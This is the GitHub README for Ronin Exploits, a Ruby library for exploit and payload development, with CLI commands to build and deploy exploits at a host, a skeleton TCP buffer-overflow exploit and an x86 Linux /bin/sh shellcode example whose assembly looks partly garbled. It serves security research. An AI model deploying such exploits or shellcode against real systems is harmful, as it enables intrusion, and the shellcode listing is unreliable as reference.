Skip to content
Ronin Exploits is a Ruby library for Ronin that provides exploitation and payload crafting functionality.
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Failed to load latest commit information.
bin
data/ronin
lib/ronin
spec
.document
.gemtest
.gitignore
.rspec
.yardopts
COPYING.txt
ChangeLog.md
Gemfile
README.md
Rakefile
gemspec.yml
ronin-exploits.gemspec

README.md

Ronin Exploits

Description

Ronin Exploits is a Ruby library for Ronin that provides exploitation and payload crafting functionality.

Ronin is a Ruby platform for exploit development and security research. Ronin allows for the rapid development and distribution of code, exploits or payloads over many common Source-Code-Management (SCM) systems.

Ruby

Ronin's Ruby environment allows security researchers to leverage Ruby with ease. The Ruby environment contains a multitude of convenience methods for working with data in Ruby, a Ruby Object Database, a customized Ruby Console and an extendable command-line interface.

Extend

Ronin's more specialized features are provided by additional Ronin libraries, which users can choose to install. These libraries can allow one to write and run Exploits and Payloads, scan for PHP vulnerabilities, perform Google Dorks or run 3rd party scanners.

Publish

Ronin allows users to publish and share code, exploits, payloads or other data via Overlays. Overlays are directories of code and data that can be hosted on any SVN, Hg, Git or Rsync server. Ronin makes it easy to create, install or update Overlays.

Features

  • Define Exploits based on:
    • Whether they are local or remote.
    • Protocol they use.
    • Contributing authors.
    • Exploited behaviors.
    • Disclosure status.
    • Level of weaponization.
    • Architectures they target.
    • OSes they target.
    • Products they target.
  • Define Payloads based on:
    • Contributing authors.
    • Helpers they use.
  • Define Payload Encoders:
    • Architectures they target.
    • OSes they target.
  • Provides a simple three phase process of building, verifying and deploying Exploits and Payloads.
  • Allows adding arbitrary target data to the targets of Exploits.
  • Allows combining Payloads with Exploits.
  • Allows using a raw-payload with an Exploit.
  • Allows the addition of multiple Payload Encoders to an Exploit.
  • Allows chaining multiple Payloads together.
  • Provides the following Exploit classes:
    • {Ronin::Exploits::Exploit}
    • {Ronin::Exploits::Local}
    • {Ronin::Exploits::Remote}
    • {Ronin::Exploits::RemoteTCP}
    • {Ronin::Exploits::RemoteUDP}
    • {Ronin::Exploits::HTTP}
    • {Ronin::Exploits::FTP}
    • {Ronin::Exploits::Web}
  • Provides the following Exploit helpers:
    • {Ronin::Exploits::Helpers::Binary}
    • {Ronin::Exploits::Helpers::Padding}
    • {Ronin::Exploits::Helpers::BufferOverflow}
    • {Ronin::Exploits::Helpers::FormatString}
    • {Ronin::Exploits::Helpers::FileBuilder}
  • Provides the following Payload classes:
    • {Ronin::Payloads::Payload}
    • {Ronin::Payloads::BinaryPayload}
    • {Ronin::Payloads::ASMPayload}
    • {Ronin::Payloads::Nops}
    • {Ronin::Payloads::Shellcode}
    • {Ronin::Payloads::BindShell}
  • Provides the following Payload helpers:
    • {Ronin::Payloads::Helpers::BindShell}
  • Provides an API for Post-Exploitation ({Ronin::PostExploitation}).
  • Provides a multitude of exploit and payload generators which can create customized skeleton Ruby Exploits and Payloads.

Synopsis

Generate a skeleton exploit, with some custom information:

$ ronin-gen exploit example_exploit.rb \
    --name Example --arch i686 --os Linux --product "Example Product" \
    --status proven \
    --authors Postmodern --description "This is an example."
  • To generate other types of exploits, you can specify local_exploit, remote_exploit, remote_tcp_exploit, remote_udp_exploit, ftp_exploit, http_exploit or web_exploit, instead of simply exploit.

Generate a skeleton payload, with some custom information:

$ ronin-gen payload example_payload.rb \
    --name Example --arch i686 --os Linux \
    --authors Postmodern --description "This is an example."
  • To generate other types of payloads, you can specify binary_payload, shellcode or nops, instead of simply payload.

List available exploits:

$ ronin-exploits

Print information about an exploit:

$ ronin-exploits -n NAME -v

Build and deploy an exploit:

$ ronin-exploit -n NAME --host example.com --port 9999

Load an exploit from a file, then build and deploy it:

$ ronin-exploit -f FILE --host example.com --port 9999

Build and deploy an exploit, with a payload:

$ ronin-exploit -n NAME --host example.com --port 9999 -P PAYLOAD_NAME

Build and deploy an exploit, with a raw payload:

$ ronin-exploit -n NAME --host example.com --port 9999 --raw-payload \
    `echo -en "\x66\x31\xc0\xfe\xc0\xb3\xff\xcd\x80"`

List available payloads:

$ ronin-payloads

Print information about a payload:

$ ronin-payloads -n NAME -v

Build and output a payload:

$ ronin-payload NAME

Build and output a raw unescaped payload:

$ ronin-payload NAME --raw

Load a payload from a file, then build and output it:

$ ronin-payload -f FILE

Examples

Define a remote TCP exploit:

require 'ronin/exploits/remote_tcp'

Ronin::Exploits::RemoteTCP.object do

  helper :buffer_overflow

  #
  # Cacheable data.
  #
  cache do
    self.name        = 'test'
    self.description = %{This is an example exploit.}

    self.status      = :potential
    self.released    = true

    author :name => 'Postmodern', :organization => 'SophSec'

    targeting do |t|
      t.targets_arch     :x86
      t.targets_os       :name => 'Linux'
      t.targets_software :name => 'ExampleWare', :version => '2.4.7b'
    end
  end

  #
  # Builds the exploit.
  #
  build do
    @buffer = "USER #{build_buffer}\n"
  end

  #
  # Deploys the built exploit.
  #
  deploy do
    tcp_send @buffer
  end

  #
  # Evacuates the deployed exploit.
  #
  evacuate do
    tcp_send "QUIT"
  end

end

Define a shellcode payload:

require 'ronin/payloads/shellcode'

Ronin::Payloads::Shellcode.object do

  cache do
    self.name        = 'local_shell'
    self.version     = '0.5'
    self.description = %{
      Shellcode that spawns a local /bin/sh shell
    }

    targets_arch :x86
    targets_os   :linux
  end

  build do
    shellcode do
      xor   eax, eax
      push  eax
      push  0x68732f2f
      push  0x6e69622f
      mov   esp, ebx
      push  eax
      push  ebx
      mov   esp, ecx
      xor   edx, edx
      int   0xb
    end
  end

end

Define a payload encoder:

require 'ronin/encoders/encoder'

Ronin::Encoders::Encoder.object do

  #
  # Cacheable data.
  #
  cache do
    self.name        = 'base64_encode'
    self.description = %{Example base64 payload encoder}

    self.targets_arch :x86
    self.targets_os   :name => 'Linux'
  end

  #
  # Base64 encodes the specified data.
  #
  def encode(data)
    return data.to_s.base64_encode
  end

end

Requirements

Install

Stable

$ gem install ronin-exploits

Edge

$ git clone git://github.com/ronin-ruby/ronin-exploits.git
$ cd ronin-exploits/
$ bundle install
$ ./bin/ronin-exploit --help

License

Ronin Exploits - A Ruby library for Ronin that provides exploitation and payload crafting functionality.

Copyright (c) 2007-2011 Hal Brodigan (postmodern.mod3 at gmail.com)

This file is part of Ronin Exploits.

Ronin is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

Ronin is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with Ronin. If not, see http://www.gnu.org/licenses/.

Something went wrong with that request. Please try again.